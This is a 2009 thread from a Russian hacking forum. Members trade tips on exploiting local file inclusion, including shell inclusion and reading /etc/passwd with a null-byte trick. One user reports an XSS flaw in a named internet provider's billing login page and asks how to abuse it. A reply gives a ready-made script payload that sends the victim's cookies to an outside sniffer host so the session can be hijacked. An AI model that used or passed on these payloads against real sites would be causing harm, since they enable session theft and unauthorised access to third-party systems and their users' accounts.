HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7031  
Старый 07.05.2009, 16:45
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от AET  
тоесть инклудовать свой шелл, на другую страницу
А, "инклудовать"?! Это совсем другое дело.

Думаю если у Вас существует возможность "инклудовать свой шелл" , а так-же "на запись в папку правать", то создать папку, либо файл, вполне возможно. Прям из "инклудоваемого" шелла.

Единственное, что опять повергает меня в сомнения это фраза "на другую страницу". Дело в том, что этот момент я так и не смог понять, поэтому ответ возможно не полон.

PS Простите за грамматику, не вполне ещё освоился с Вашим диалектом
 
Ответить с цитированием

  #7032  
Старый 07.05.2009, 16:48
AET
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106

Репутация: -2
По умолчанию

-m0rgan- да я так и хотел сделать

jokester вы меня поняли блогодарен

Последний раз редактировалось AET; 07.05.2009 в 16:51..
 
Ответить с цитированием

  #7033  
Старый 07.05.2009, 17:15
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

R1dex
Я не совсем понял, можно ли поподробнее?
 
Ответить с цитированием

  #7034  
Старый 07.05.2009, 17:27
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от -m0rgan-  
А что ты хочишь получить от даной уязвимости?
хочу получить доступ к базе!!! Возможно?

Как я понял прочитав много инфы о инклуде это локальный инклуд! И с помощью его можно только просматривать файлы с нуливым байтом %00!

Но к сожелению у меня и это не проканало!


И еже вопрос:
Можно ли error include использовать для XSS атаки?

Последний раз редактировалось geforce; 07.05.2009 в 17:41..
 
Ответить с цитированием

  #7035  
Старый 07.05.2009, 18:01
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

нулл байт скорее всего не проходит по той причине, что magic_quotes_gpc ON, ибо происходит слеширование:
Код:
Warning: include(./inc/../../../etc/passwd\0.php)
 
Ответить с цитированием

  #7036  
Старый 07.05.2009, 18:26
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от -m0rgan-  
нулл байт скорее всего не проходит по той причине, что magic_quotes_gpc ON, ибо происходит слеширование:
Код:
Warning: include(./inc/../../../etc/passwd\0.php)

Это означает что это безполезная инклуда???
 
Ответить с цитированием

  #7037  
Старый 07.05.2009, 18:30
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2geforce
попробуй аналог нуллбайту
raz0r.name/articles/null-byte-alternative/
 
Ответить с цитированием

Onyma Biling
  #7038  
Старый 07.05.2009, 18:36
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question Onyma Biling

Есть ссылка на инет провайдера!
https://stat.tvingo.ru/

при вписывании в окно Регистрационное имя
xss код '<script>alert(123)</script>

Этим можно как нибудь воспользоваться???
 
Ответить с цитированием

  #7039  
Старый 07.05.2009, 18:38
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

http://forum.antichat.ru/thread20140.html
 
Ответить с цитированием

  #7040  
Старый 07.05.2009, 18:50
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

2geforce
Ты можешь составить запрос:
Код:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
(c)Micr0b
Для перенаправления куков на сниффер.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ